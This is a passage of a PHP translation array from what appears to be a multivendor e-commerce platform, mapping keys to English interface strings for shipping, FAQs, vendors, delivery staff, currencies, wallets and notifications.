'Cancellation Policy', 'about_Us' => 'About Us', 'help_topic_Table' => 'Help topic Table', 'add_FAQ' => 'Add FAQ', 'question' => 'Question', 'answer' => 'Answer', 'ranking' => 'Ranking', 'add_Help_Topic' => 'Add Help Topic', 'type_Question' => 'Type Question', 'type_Answer' => 'Type Answer', 'edit_Modal_Help_Topic' => 'Edit Modal Help Topic', 'are_you_sure_delete_this_FAQ' => 'Are you sure delete this FAQ', 'FAQ_deleted_successfully' => 'FAQ deleted successfully', 'want_to_Turn_ON_This_Shipping_Method' => 'Want to Turn ON This Shipping Method', 'want_to_Turn_OFF_This_Shipping_Method' => 'Want to Turn OFF This Shipping Method', 'if_you_enable_this_shipping_method_will_be_shown_in_the_user_app_and_website_for_customer_checkout' => 'If you enable this shipping method will be shown in the user app and website for customer checkout', 'if_you_disable_this_shipping_method_will_not_be_shown_in_the_user_app_and_website_for_customer_checkout' => 'If you disable this shipping method will not be shown in the user app and website for customer checkout', 'want_to_Turn_ON_This_FAQ' => 'Want to Turn ON This FAQ', 'want_to_Turn_OFF_This_FAQ' => 'Want to Turn OFF This FAQ', 'if_you_enable_this_FAQ_will_be_shown_in_the_user_app_and_website' => 'If you enable this FAQ will be shown in the user app and website', 'if_you_disable_this_FAQ_will_not_be_shown_in_the_user_app_and_website' => 'If you disable this FAQ will not be shown in the user app and website', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products. For “Ready After Sale” deliveries customers pay first then seller uploads the digital products that become available to customers for download', 'add_your_products_thumbnail_in' => 'Add your products thumbnail in', 'without_configuring_this_section_map_functionality_will_not_work_properly' => 'Without configuring this section map functionality will not work properly', 'thus_the_whole_system_will_not_work_as_it_planned' => 'Thus the whole system will not work as it planned', 'client_key_should_have_enable_map_javascript_api_and_you_can_restrict_it_with_http_refere' => 'Client key should have enable map javascript api and you can restrict it with http refere', 'server_key_should_have_enable_place_api_key_and_you_can_restrict_it_with_ip' => 'Server key should have enable place api key and you can restrict it with ip', 'you_can_use_same_api_for_both_field_without_any_restrictions' => 'You can use same api for both field without any restrictions', 'your_order_is_being_processed_and_will_be_completed_within_3_to_6_hours' => 'Your order is being processed and will be completed within 3 to 6 hours', 'contact_your_email_service_provider_or_IT_administrator_to_obtain_the_SMTP_server_details_such_as_hostname_port_username_and_password' => 'Contact your email service provider or IT administrator to obtain the SMTP server details such as hostname port username and password', 'products_Stock' => 'Products Stock', 'shop_not_found' => 'Shop not found', 'if_enabled_this_icon_will_be_available_on_the_website_and_customer_app' => 'If enabled this icon will be available on the website and customer app', 'if_disabled_this_icon_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this icon will be hidden from the website and customer app', 'google-plus' => 'Google-plus', 'linkedin' => 'Linkedin', 'this_page_contains_sensitive_information.Make_sure_before_changing.' => 'This page contains sensitive information.Make sure before changing.', 'addon settings' => 'Addon settings', 'add fund bonus categ...' => 'Add fund bonus categ...', 'digital product otp ...' => 'Digital product otp ...', 'guest users' => 'Guest users', 'most demandeds' => 'Most demandeds', 'notification seens' => 'Notification seens', 'offline payments' => 'Offline payments', 'offline payment meth...' => 'Offline payment meth...', 'order delivery verif...' => 'Order delivery verif...', 'payment requests' => 'Payment requests', 'sensitive_data' => 'Sensitive data', 'make_sure_before_changing.' => 'Make sure before changing.', 'No_Table_Updated' => 'No Table Updated', 'update_delivery_man' => 'Update delivery man', 'update_Deliveryman' => 'Update Deliveryman', 'new_delivery_man' => 'New delivery man', 'withdraw_information_view' => 'Withdraw information view', 'delivery_Man_Withdraw_Information' => 'Delivery Man Withdraw Information', 'withdraw_request_process' => 'Withdraw request process', 'approve' => 'Approve', 'note_about_transaction_or_request' => 'Note about transaction or request', 'upload_File' => 'Upload File', 'choose_Images' => 'Choose Images', 'file_path_copied_successfully' => 'File path copied successfully', 'shop_cover_image' => 'Shop cover image', 'secondary_banner' => 'Secondary banner', 'secondary' => 'Secondary', 'order_status_updated_successfully' => 'Order status updated successfully', 'Want_to_Turn_ON_Push_Notification' => 'Want to Turn ON Push Notification', 'Want_to_Turn_OFF_Push_Notification' => 'Want to Turn OFF Push Notification', 'if_enabled_customers_and_seller_will_receive_notifications_on_their_devices' => 'If enabled customers and seller will receive notifications on their devices', 'if_disabled_customers_and_seller_will_not_receive_notifications_on_their_devices' => 'If disabled customers and seller will not receive notifications on their devices', 'if_enabled_customers_will_receive_notifications_on_their_devices' => 'If enabled customers will receive notifications on their devices', 'if_disabled_customers_will_not_receive_notifications_on_their_devices' => 'If disabled customers will not receive notifications on their devices', 'Deliveryman_Assign_Message' => 'Deliveryman Assign Message', 'if_enabled_customers_and_deliveryman_will_receive_notifications_on_their_devices' => 'If enabled customers and deliveryman will receive notifications on their devices', 'if_disabled_customers_and_deliveryman_will_not_receive_notifications_on_their_devices' => 'If disabled customers and deliveryman will not receive notifications on their devices', 'Deliveryman_Start_Message' => 'Deliveryman Start Message', 'Deliveryman_Delivered_Message' => 'Deliveryman Delivered Message', 'Deliveryman_Reschedule_Message' => 'Deliveryman Reschedule Message', 'Want_to_Turn_ON_Notification_Status' => 'Want to Turn ON Notification Status', 'Want_to_Turn_OFF_Notification_Status' => 'Want to Turn OFF Notification Status', 'product_thumbnail_is_required!' => 'Product thumbnail is required!', 'category_is_required!' => 'Category is required!', 'unit_is_required!' => 'Unit is required!', 'code_must_be_positive!' => 'Code must be positive!', 'code_must_be_minimum_6_digits!' => 'Code must be minimum 6 digits!', 'minimum_order_quantity_is_required!' => 'Minimum order quantity is required!', 'minimum_order_quantity_must_be_positive!' => 'Minimum order quantity must be positive!', 'ready_product_upload_is_required!' => 'Ready product upload is required!', 'ready_product_upload_must_be_a_file_of_type' => 'Ready product upload must be a file of type', 'digital_product_type_is_required!' => 'Digital product type is required!', 'shipping_cost_is_required!' => 'Shipping cost is required!', 'Category_status' => 'Category status', 'if_enabled_this_category_it_will_be_visible_from_the_category_wise_product_section_in_the_website_and_customer_app_in_the_homepage' => 'If enabled this category it will be visible from the category wise product section in the website and customer app in the homepage', 'if_disabled_this_category_it_will_be_hidden_from_the_category_wise_product_section_in_the_website_and_customer_app_in_the_homepage' => 'If disabled this category it will be hidden from the category wise product section in the website and customer app in the homepage', 'if_enabled_this_brand_will_be_available_on_the_website_and_customer_app' => 'If enabled this brand will be available on the website and customer app', 'if_disabled_this_brand_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this brand will be hidden from the website and customer app', 'brands_not_found' => 'Brands not found', 'Want_to_Turn_ON_Customer_Reviews' => 'Want to Turn ON Customer Reviews', 'Want_to_Turn_OFF_Customer_Reviews' => 'Want to Turn OFF Customer Reviews', 'if_enabled_anyone_can_see_this_review_on_the_user_website_and_customer_app' => 'If enabled anyone can see this review on the user website and customer app', 'if_disabled_this_review_will_be_hidden_from_the_user_website_and_customer_app' => 'If disabled this review will be hidden from the user website and customer app', 'search_by_bonus_title' => 'Search by bonus title', 'minimum_amount_can_not_be_greater_than_bonus_amount' => 'Minimum amount can not be greater than bonus amount', 'create_Role' => 'Create Role', 'select_All' => 'Select All', 'employee_Roles' => 'Employee Roles', 'order management' => 'Order management', 'system settings' => 'System settings', 'Want_to_Turn_ON_Employee_Status' => 'Want to Turn ON Employee Status', 'Want_to_Turn_OFF_Employee_Status' => 'Want to Turn OFF Employee Status', 'when_the_status_is_enabled_employees_can_access_the_system_to_perform_their_responsibilities.' => 'When the status is enabled employees can access the system to perform their responsibilities.', 'when_the_status_is_disabled_employees_cannot_access_the_system_to_perform_their_responsibilities' => 'When the status is disabled employees cannot access the system to perform their responsibilities', 'are_you_sure_delete_this_role' => 'Are you sure delete this role', 'role_deleted_successfully' => 'Role deleted successfully', 'role' => 'Role', 'if_enabled_this_employee_can_log_in_to_the_system_and_perform_his_role' => 'If enabled this employee can log in to the system and perform his role', 'if_disabled_this_employee_can_not_log_in_to_the_system_and_perform_his_role' => 'If disabled this employee can not log in to the system and perform his role', 'invalid_customer' => 'Invalid customer', 'digital_Product_OTP_Verification' => 'Digital Product OTP Verification', 'OTP_Verification_Code' => 'OTP Verification Code', 'your_OTP_Verification_Code' => 'Your OTP Verification Code', 'feature_Deal' => 'Feature Deal', 'feature_deal_Table' => 'Feature deal Table', 'search by Title' => 'Search by Title', 'Want_to_Turn_ON_Featured_Deal_Status' => 'Want to Turn ON Featured Deal Status', 'Want_to_Turn_OFF_Featured_Deal_Status' => 'Want to Turn OFF Featured Deal Status', 'if_enabled_this_featured_deal_will_be_available_on_the_website_and_customer_app' => 'If enabled this featured deal will be available on the website and customer app', 'if_disabled_this_featured_deal_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this featured deal will be hidden from the website and customer app', 'feature_Deal_Update' => 'Feature Deal Update', 'update_feature_deal' => 'Update feature deal', 'deal_updated_successfully' => 'Deal updated successfully', 'Feature_Deal' => 'Feature Deal', 'Feature_Deal_for_this_season' => 'Feature Deal for this season', 'find_your_best_Feature_Deal_product' => 'Find your best Feature Deal product', 'find_best_Feature_Deal_product' => 'Find best Feature Deal product', 'Want_to_Turn_ON_Most_Demanded_Product_Status' => 'Want to Turn ON Most Demanded Product Status', 'Want_to_Turn_OFF_Most_Demanded_Product_Status' => 'Want to Turn OFF Most Demanded Product Status', 'if_enabled_this_most_demanded_product_will_be_available_on_the_website_and_customer_app' => 'If enabled this most demanded product will be available on the website and customer app', 'if_disabled_this_most_demanded_product_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this most demanded product will be hidden from the website and customer app', 'find_your_best_featured_deal_product' => 'Find your best featured deal product', 'disabling_reCAPTCHA_may_leave_your_website_vulnerable_to_spam_and_malicious_activity_and_suspects_that_a_user_may_be_a_bot' => 'Disabling reCAPTCHA may leave your website vulnerable to spam and malicious activity and suspects that a user may be a bot', 'it_is_highly_recommended_to_keep_reCAPTCHA_enabled_to_ensure_the_security_and_integrity_of_your_website' => 'It is highly recommended to keep reCAPTCHA enabled to ensure the security and integrity of your website', 'Sorry_the_minimum_value_was_reached' => 'Sorry the minimum value was reached', 'Sorry_stock_limit_exceeded' => 'Sorry stock limit exceeded', 'if_you_enable_this_option_your_shop_will_be_shown_as_temporarily_closed_in_the_user_app_and_website_and_customers_cannot_add_products_from_your_shop' => 'If you enable this option your shop will be shown as temporarily closed in the user app and website and customers cannot add products from your shop', 'if_you_disable_this_option_your_shop_will_be_open_in_the_user_app_and_website_and_customers_can_add_products_from_your_shop' => 'If you disable this option your shop will be open in the user app and website and customers can add products from your shop', 'by_turning_on_temporary_close_mode_your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers. they cannot purchase or place order from your shop', 'customers_will_get_free_delivery_if_the_order_amount_exceeds_the_given_amount' => 'Customers will get free delivery if the order amount exceeds the given amount', 'and_the_given_amount_will_be_added_as_seller_expenses' => 'And the given amount will be added as seller expenses', 'Withdraw_request_has_been_sent' => 'Withdraw request has been sent', 'seller_Withdraw_Information' => 'Seller Withdraw Information', 'Seller_Payment_has_been_approved_successfully' => 'Seller Payment has been approved successfully', 'out for delivery' => 'Out for delivery', 'don t_miss_todays_deal' => 'Don t miss todays deal', 'admin_bonus' => 'Admin bonus', 'followed' => 'Followed', 123456 => '123456', 'add_new_field' => 'Add new field', 'o_Share_Via' => 'O Share Via', 'they_register' => 'They register', 'with_special_offer' => 'With special offer', 'Share_Via' => 'Share Via', 'product_reviews' => 'Product reviews', 'choose_Product' => 'Choose Product', 'choose_Customer' => 'Choose Customer', 'choose_Status' => 'Choose Status', 'from_Date' => 'From Date', 'Seller_has_been_approved_successfully' => 'Seller has been approved successfully', 'pi 3NzwTM2eZvKYlo2C0OAf5Mbg' => 'Pi 3NzwTM2eZvKYlo2C0OAf5Mbg', 'sub_Category_Setup' => 'Sub Category Setup', 'sub_category_name' => 'Sub category name', 'new_Sub_Category' => 'New Sub Category', 'main_Category' => 'Main Category', 'select_main_category' => 'Select main category', 'search_by_Sub_Category' => 'Search by Sub Category', 'are_you_sure_to_delete_this_sub_category' => 'Are you sure to delete this sub category', 'sub_Category_deleted_Successfully.' => 'Sub Category deleted Successfully.', 'sub' => 'Sub', 'sub_Sub_Category_Setup' => 'Sub Sub Category Setup', 'new_Sub_Sub_Category' => 'New Sub Sub Category', 'sub_category_Name' => 'Sub category Name', 'search_by_Sub_Sub_Category' => 'Search by Sub Sub Category', 'sub_Sub_Category_Deleted_Successfully' => 'Sub Sub Category Deleted Successfully', 'sub_Sub' => 'Sub Sub', 'Category_added_successfully' => 'Category added successfully', 'Category_updated_successfully' => 'Category updated successfully', 'category_updated_successfully' => 'Category updated successfully', 'sub_category_Image' => 'Sub category Image', 'Admin_also_reward_their_top_customers_with_wallet_money' => 'Admin also reward their top customers with wallet money', 'You_do_not_have_any' => 'You do not have any', 'transaction_yet' => 'Transaction yet', 'This_shop_is_temporary_closed_or_on_vacation' => 'This shop is temporary closed or on vacation', 'Chat_with_us_on_WhatsApp' => 'Chat with us on WhatsApp', 'Please_review_the_ratio_before_upload' => 'Please review the ratio before upload', 'you_do_not_have_any' => 'You do not have any', 'cannot_input_minus_value' => 'Cannot input minus value', 'order_number' => 'Order number', 'no_Transaction_Found' => 'No Transaction Found', 'Ex:_7+ character' => 'Ex: 7+ character', 'Ex:_7+_character' => 'Ex: 7+ character', 'password_Must_Be_8_Character' => 'Password Must Be 8 Character', 'Estimated_Delivery_Date' => 'Estimated Delivery Date', 'check_Now' => 'Check Now', 'select_a_payment_method_first' => 'Select a payment method first', 'say_something' => 'Say something', 'Your current payment settings are disabled because you have enabled payment gateway addon To visit your currently active payment gateway settings please follow the link.' => 'Your current payment settings are disabled because you have enabled payment gateway addon To visit your currently active payment gateway settings please follow the link.', 'addon_Menus' => 'Addon Menus', 'Sorry_stock_limit_exceeded.' => 'Sorry stock limit exceeded.', 'your_order_has_been_processed.' => 'Your order has been processed.', 'check_your_email_to_get_the_order_id_and_details.' => 'Check your email to get the order id and details.', 'Language_Added' => 'Language Added', 'Default_Language_Changed' => 'Default Language Changed', 'image_is_required' => 'Image is required', 'logo_name_is_required' => 'Logo name is required', 'banner_name_is_required' => 'Banner name is required', 'bottom_banner_name_is_required' => 'Bottom banner name is required', 'shop_address_is_required' => 'Shop address is required', 'shop_apply_successfully' => 'Shop apply successfully', 'Product_added_successfully' => 'Product added successfully', 'account _number' => 'Account number', 'select_Date_Type' => 'Select Date Type', 'Image_Not_found' => 'Image Not found', 'Digital_file_upload_successfully' => 'Digital file upload successfully', 'default-currency_setup' => 'Default-currency setup', 'add_currency' => 'Add currency', 'add_the_name_of_the_currency_you_want_to_add' => 'Add the name of the currency you want to add', 'add_the_symbol_of_the_currency_you_want_to_add' => 'Add the symbol of the currency you want to add', 'add_the_code_of_the_currency_you_want_to_add' => 'Add the code of the currency you want to add', 'Want_to_Turn_ON_Currency_Status' => 'Want to Turn ON Currency Status', 'Want_to_Turn_OFF_Currency_Status' => 'Want to Turn OFF Currency Status', 'if_enabled_this_currency_will_be_available_throughout_the_entire_system' => 'If enabled this currency will be available throughout the entire system', 'if_disabled_this_currency_will_be_hidden_from_the_entire_system' => 'If disabled this currency will be hidden from the entire system', 'currency_removed_successfully' => 'Currency removed successfully', 'this_Currency_cannot_be_removed_due_to_payment_gateway_dependency' => 'This Currency cannot be removed due to payment gateway dependency', 'customer_Review' => 'Customer Review', 'filter_Criteria' => 'Filter Criteria', 'search_Bar_Content' => 'Search Bar Content', 'Payment_success' => 'Payment success', 'hurry_Up' => 'Hurry Up', 'the_offer_is_limited' => 'The offer is limited', 'grab_while_it_lasts' => 'Grab while it lasts', 'top_sellers' => 'Top sellers', 'user_profile' => 'User profile', 'more_from_the_store' => 'More from the store', 'message_send_successfully' => 'Message send successfully', 'download_invoice' => 'Download invoice', 'rate_the_quality' => 'Rate the quality', 'very_good' => 'Very good', 'have_thoughts_to_share' => 'Have thoughts to share', 'best_product _highly_recommended' => 'Best product highly recommended', 'upload_images' => 'Upload images', 'the_product_is_good' => 'The product is good', 'very_Good' => 'Very Good', 'this_product_is_very_good_I_am_highly_impressed' => 'This product is very good I am highly impressed', 'give_a_refund_reason' => 'Give a refund reason', 'write_here' => 'Write here', 'send_request' => 'Send request', 'Assign' => 'Assign', '19 July 2023' => '19 July 2023', 'rate_the_delivery_quality' => 'Rate the delivery quality', 'best_delivery_service _highly_recommended' => 'Best delivery service highly recommended', 'the_delivery_service_is_good' => 'The delivery service is good', 'this_delivery_service_is_very_good_I_am_highly_impressed' => 'This delivery service is very good I am highly impressed', 'delivery_man_review' => 'Delivery man review', 'update_review' => 'Update review', 'Update_Review' => 'Update Review', 'you_have_saved' => 'You have saved', 'this_order_contains_one_or_more_digital_products.' => 'This order contains one or more digital products.', 'delivery_man_is_not_assigned_for_digital_products' => 'Delivery man is not assigned for digital products', 'this_order_is_a_POS_order.delivery_man_is_not_assigned_to_POS_orders' => 'This order is a POS order.delivery man is not assigned to POS orders', 'see_payment_details' => 'See payment details', 'payment_verification' => 'Payment verification', 'payment_information' => 'Payment information', 'due' => 'Due', 'you_have_Saved' => 'You have Saved', 'proceed_to_Next' => 'Proceed to Next', 'continue_Shopping' => 'Continue Shopping', 'Dark_Mode' => 'Dark Mode', 'Light_Mode' => 'Light Mode', 'Jhone' => 'Jhone', 880 => '880', 'OTP_has_been_sent_again' => 'OTP has been sent again', 'please_wait_for_new_code' => 'Please wait for new code', 'password_does_not_Match' => 'Password does not Match', 'you_can_review_after_the_product_is_delivered' => 'You can review after the product is delivered', 'you_can_refund_request_after_the_product_is_delivered' => 'You can refund request after the product is delivered', 'pi 3NzHbf2eZvKYlo2C098tVr0K' => 'Pi 3NzHbf2eZvKYlo2C098tVr0K', 'No_data_found_for_export' => 'No data found for export', 'ame' => 'Ame', 'add_new_contact_information' => 'Add new contact information', 'contact_name' => 'Contact name', 'contact_information_Table' => 'Contact information Table', 'Want_to_Turn_ON_Support_Ticket_Status' => 'Want to Turn ON Support Ticket Status', 'Want_to_Turn_OFF_Support_Ticket_Status' => 'Want to Turn OFF Support Ticket Status', 'if_enabled_this_support_ticket_will_be_active' => 'If enabled this support ticket will be active', 'if_disabled_this_support_ticket_will_be_inactive' => 'If disabled this support ticket will be inactive', 'for_customer' => 'For customer', 'for_seller' => 'For seller', 'for_delivery_man' => 'For delivery man', 'order_pending_message' => 'Order pending message', 'order_confirmation_message' => 'Order confirmation message', 'order_processing_message' => 'Order processing message', 'order_out_for_delivery_message' => 'Order out for delivery message', 'order_delivered_message' => 'Order delivered message', 'order_returned_message' => 'Order returned message', 'order_failed_message' => 'Order failed message', 'fund_added_by_admin_message' => 'Fund added by admin message', 'new_order_message' => 'New order message', 'order_cancellation_message' => 'Order cancellation message', 'refund_request_message' => 'Refund request message', 'order_edit_message' => 'Order edit message', 'withdraw_request_status_message' => 'Withdraw request status message', 'message_from_customer' => 'Message from customer', 'delivery_man_assign_by_admin_message' => 'Delivery man assign by admin message', 'refund_request_status_changed_by_admin' => 'Refund request status changed by admin', 'new_order_assigned_message' => 'New order assigned message', 'delivery_man_charge' => 'Delivery man charge', 'order_rescheduled_message' => 'Order rescheduled message', 'message_from_admin' => 'Message from admin', 'cash_collect_by_admin_message' => 'Cash collect by admin message', 'cash_collect_by_seller_message' => 'Cash collect by seller message', 'important_notice' => 'Important notice', 'to_include_specific_details_in_your_push_notification_message you_can_use_the_following_placeholders' => 'To include specific details in your push notification message you can use the following placeholders', 'the_name_of_the_delivery_person' => 'The name of the delivery person', 'the_unique_ID_of_the_order' => 'The unique ID of the order', 'the_expected_delivery_time' => 'The expected delivery time', 'the_name_of_the_user_who_placed_the_order' => 'The name of the user who placed the order', 'order place in pos' => 'Order place in pos', 'earned by referral' => 'Earned by referral', 'gdfgfdh' => 'Gdfgfdh', 'super_admin' => 'Super admin', 'search_delivery_man' => 'Search delivery man', 'no_Message_available' => 'No Message available', 'type_Something' => 'Type Something', 'add_New_Contact_Information' => 'Add New Contact Information', 'want_to_remove_this_information' => 'Want to remove this information', 'earning_Statement' => 'Earning Statement', 'earning_statement' => 'Earning statement', 'order_History_Log' => 'Order History Log', 'deliveryman_Wallet' => 'Deliveryman Wallet', 'cash_in_hand' => 'Cash in hand', 'collect_Cash' => 'Collect Cash', 'current_balance' => 'Current balance', 'total_withdrawn' => 'Total withdrawn', 'delivery_Man_Account' => 'Delivery Man Account', 'cash_Withdraw' => 'Cash Withdraw', 'total_Cash_In_Hand' => 'Total Cash In Hand', 'search_by_order_no' => 'Search by order no', 'current_status' => 'Current status', 'history' => 'History', 'employee_details' => 'Employee details', 'EMP' => 'EMP', 'join' => 'Join', 'access_abailable' => 'Access abailable', 'you_can_create_or_edit_role_form_employee_role_setup' => 'You can create or edit role form employee role setup', 'search_by_name_or_sku' => 'Search by name or sku', 'based_on_your_region_set_the_exchange_rate_of_the_currency_you_want_to_add' => 'Based on your region set the exchange rate of the currency you want to add', 'Currency_status_successfully_changed.' => 'Currency status successfully changed.', 'System_Default_currency_updated_successfully' => 'System Default currency updated successfully', 'Add_Fund_To_Wallet' => 'Add Fund To Wallet', 'welcome' => 'Welcome', 'Transaction Sucessfull' => 'Transaction Sucessfull', 'amount sucessfully credited to your wallet' => 'Amount sucessfully credited to your wallet', 'Rewared by company admin' => 'Rewared by company admin', 'dear' => 'Dear', 'Thank you for joinning with' => 'Thank you for joinning with', 'If you require any assistance or have feedback or suggestions about our site you can email us at' => 'If you require any assistance or have feedback or suggestions about our site you can email us at', 'All copy right reserved' => 'All copy right reserved', 'you_can_not_delete_all_images' => 'You can not delete all images', 'product_image_removed_successfully' => 'Product image removed successfully', 'no_product_found' => 'No product found', 'sorry_no_data_found_related_to_your_search' => 'Sorry no data found related to your search', 'all_Brands' => 'All Brands', 'company_reliability' => 'Company reliability', 'item_1' => 'Item 1', 'item_2' => 'Item 2', 'item_3' => 'Item 3', 'item_4' => 'Item 4', 'title 1000' => 'Title 1000', 'Title 2' => 'Title 2', 'title 3' => 'Title 3', 'total_shipping_cost' => 'Total shipping cost', 'no_ticket_found' => 'No ticket found', 'no_address_found' => 'No address found', 'my_Profile' => 'My Profile', 'top_Fashion_House' => 'Top Fashion House', 'type_your_message' => 'Type your message', 'my_support_tickets' => 'My support tickets', 'you_will_get_response_soon' => 'You will get response soon', 'leave_your_issue' => 'Leave your issue', 'Fast Delivery all across the country' => 'Fast Delivery all across the country', 'Send_Message_to_seller' => 'Send Message to seller', 'No review given yet' => 'No review given yet', 'log_in' => 'Log in', 'Enjoy_New_experience_Sign_Up' => 'Enjoy New experience Sign Up', 'high_to_Low_Price' => 'High to Low Price', 'saved_address' => 'Saved address', 'select_a_payment_method_to_proceed' => 'Select a payment method to proceed', 'go_back' => 'Go back', 'pay_via_Wallet' => 'Pay via Wallet', 'pay_via_online' => 'Pay via online', 'pay_offline' => 'Pay offline', 'admin_have_no_permission_for_sellers_digital_product_upload' => 'Admin have no permission for sellers digital product upload', 'view_Products' => 'View Products', 'Write_here' => 'Write here', 'Product_has_been_removed_from_wishlist' => 'Product has been removed from wishlist', 'Okay' => 'Okay', 'Your_Cart_is_Empty' => 'Your Cart is Empty', 'cash_on_Delivery' => 'Cash on Delivery', 'the_following_items_in_your_cart_are_currently_out_of_stock' => 'The following items in your cart are currently out of stock', 'Please_Login' => 'Please Login', 'You_need_to_login_to_view_this_feature' => 'You need to login to view this feature', 'Delete_this_address' => 'Delete this address', 'This_address_will_be_removed_from_this_list' => 'This address will be removed from this list', 'password must be 7+ Character' => 'Password must be 7+ Character', 'update_Currency' => 'Update Currency', 'currency_update' => 'Currency update', 'currency_Name' => 'Currency Name', 'currency_Symbol' => 'Currency Symbol', 'currency_Code' => 'Currency Code', 'exchange_Rate' => 'Exchange Rate', 'convert_your_loyalty_point_to_wallet_money' => 'Convert your loyalty point to wallet money', 'minimum' => 'Minimum', 'points_required_to_convert_into_currency' => 'Points required to convert into currency', 'Total Loyalty Point' => 'Total Loyalty Point', 'Convert point to wallet money' => 'Convert point to wallet money', 'Enters Point Amount' => 'Enters Point Amount', 'my_Wishlists' => 'My Wishlists', 'Product_added_to_wishlist' => 'Product added to wishlist', 'Free delivery across all over the country' => 'Free delivery across all over the country', 'safe payment' => 'Safe payment', 'alum' => 'Alum', 'payulum' => 'Payulum', 'lilum' => 'Lilum', 'EX: Bank XYZ' => 'EX: Bank XYZ', '02xxxxx' => '02xxxxx', 500 => '500', 'xRt56bgST6' => 'XRt56bgST6', 'insert_note' => 'Insert note', 'service_name' => 'Service name', 'Mobile Banking' => 'Mobile Banking', 'thsn767fTRY7' => 'Thsn767fTRY7', 'dd/mm/yy' => 'Dd/mm/yy', 'Product_review' => 'Product review', 'for_offline_payment_options _please_follow_the_steps_below' => 'For offline payment options please follow the steps below', 'Delete_this_ticket' => 'Delete this ticket', 'This_ticket_will_be_removed_from_this_list' => 'This ticket will be removed from this list', 'close_this_ticket' => 'Close this ticket', 'type_something' => 'Type something', 'no_review_found' => 'No review found', 'my_review' => 'My review', 'product_not_uploaded_yet' => 'Product not uploaded yet', 'currency_updated_successfully' => 'Currency updated successfully', 'value_is_greater_or_equal_to' => 'Value is greater or equal to', 'file_type_jpg_jpeg_png' => 'File type jpg jpeg png', 'maximum_size_2MB' => 'Maximum size 2MB', 'download_failed' => 'Download failed', 'update_successfully' => 'Update successfully', 'no_Data_found' => 'No Data found', 'no_earning_history_found' => 'No earning history found', 'delivery_Man_Earnings' => 'Delivery Man Earnings', 'delivery_Man_Information' => 'Delivery Man Information', 'earning_Analytics' => 'Earning Analytics', 'withdrawable_Balance' => 'Withdrawable Balance', 'total_Item' => 'Total Item', 'no_order_history_found' => 'No order history found', 'delivery_Man_Order_List' => 'Delivery Man Order List', 'search_Criteria' => 'Search Criteria', 'the' => 'The', 'field is required' => 'Field is required', 'The code has already been taken.' => 'The code has already been taken.', 'this_page_is_for_A4_size_page_printer_so_it_will_not_be_visible_in_smaller_devices.' => 'This page is for A4 size page printer so it will not be visible in smaller devices.', 'in_house_product_List' => 'In house product List', 'image_URL' => 'Image URL', 'sub_Category_Name' => 'Sub Category Name', 'sub_Sub_Category_Name' => 'Sub Sub Category Name', 'product_Tags' => 'Product Tags', 'Removed_successfully' => 'Removed successfully', 'review_status_updated' => 'Review status updated', 'Category is required!' => 'Category is required!', 'Brand 1' => 'Brand 1', 'limited_Stocked_Products_List' => 'Limited Stocked Products List', 'product_quantity_updated_successfully' => 'Product quantity updated successfully', 'products_imported_successfully' => 'Products imported successfully', 'credentials_do_not_match_or_your_account_has_been_suspended' => 'Credentials do not match or your account has been suspended', 'this_page_is_for_A4_size_page_printer_so_it_won t_be_visible_in_smaller_devices.' => 'This page is for A4 size page printer so it won t be visible in smaller devices.', 'invalid_product' => 'Invalid product', 'Vendor Test Product' => 'Vendor Test Product', 'download_the_format_file_and_fill_it_with_proper_data' => 'Download the format file and fill it with proper data', 'once_you_have-downloaded_and_filled_the_format_file_upload_it_in_the_form_below_and_submit.' => 'Once you have-downloaded and filled the format file upload it in the form below and submit.', 'after_uploading_products_you_need_to_edit_them_and_set_products_images_and_choices.' => 'After uploading products you need to edit them and set products images and choices.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_images_path.' => 'You can upload your product images in product folder from gallery and copy images path.', 'import_Products_File' => 'Import Products File', 'download_Format' => 'Download Format', 'al' => 'Al', 'filter_criteria' => 'Filter criteria', 'Total_Items' => 'Total Items', 'Item_Discount' => 'Item Discount', 'Vat/Tax' => 'Vat/Tax', 0 => '0', 'update Test test pro' => 'Update Test test pro', 'seen' => 'Seen', 'Cart_is_empty' => 'Cart is empty', 'admin_Earning_List' => 'Admin Earning List', 'deliveryMan_Incentive' => 'DeliveryMan Incentive', 'vendor_Earning' => 'Vendor Earning', 'today' => 'Today', 'deliveryman_incentive' => 'Deliveryman incentive', 'image_description' => 'Image description', 'product_Attribute_Setup' => 'Product Attribute Setup', 'in-House_Products' => 'In-House Products', 'vendor_Products' => 'Vendor Products', 'product_update_requests' => 'Product update requests', 'send_notification_svg' => 'Send notification svg', 'push_notifications_setup' => 'Push notifications setup', 'push_notification_svg' => 'Push notification svg', 'vendor_Sales' => 'Vendor Sales', 'vendors' => 'Vendors', 'add_New_Vendor' => 'Add New Vendor', 'vendor_List' => 'Vendor List', 'delivery_men' => 'Delivery men', 'business_Settings' => 'Business Settings', 'in-house_Shop' => 'In-house Shop', 'login_Settings' => 'Login Settings', 'themes_&_Addons' => 'Themes & Addons', '3rd_Party' => '3rd Party', 'other_Configurations' => 'Other Configurations', 'business_Pages' => 'Business Pages', 'React_website_configuration' => 'React website configuration', 'deleted_successfully' => 'Deleted successfully', 'the_file_upload_field_is_required' => 'The file upload field is required', 'status_updated_failed' => 'Status updated failed', 'do_you_want_to_sign_out' => 'Do you want to sign out', 'do_not_Logout' => 'Do not Logout', 'want_to_change_this_language' => 'Want to change this language', 'please_enter_a_valid_integer_for_current_stock' => 'Please enter a valid integer for current stock', 'at_least_8_characters' => 'At least 8 characters', 'at_least_one_uppercase_letter_' => 'At least one uppercase letter ', 'at_least_one_number' => 'At least one number', 'at_least_one_symbol' => 'At least one symbol', 'total_Vendor' => 'Total Vendor', 'total_Vendor_Products' => 'Total Vendor Products', 'vendor_Wallet_Status' => 'Vendor Wallet Status', 'vendor_Info' => 'Vendor Info', 'general_Settings' => 'General Settings', 'payment_options' => 'Payment options', 'only_the_Admin_Panel_&_Vendor_Panel_will_be_functional' => 'Only the Admin Panel & Vendor Panel will be functional', 'company_information' => 'Company information', 'new_business' => 'New business', 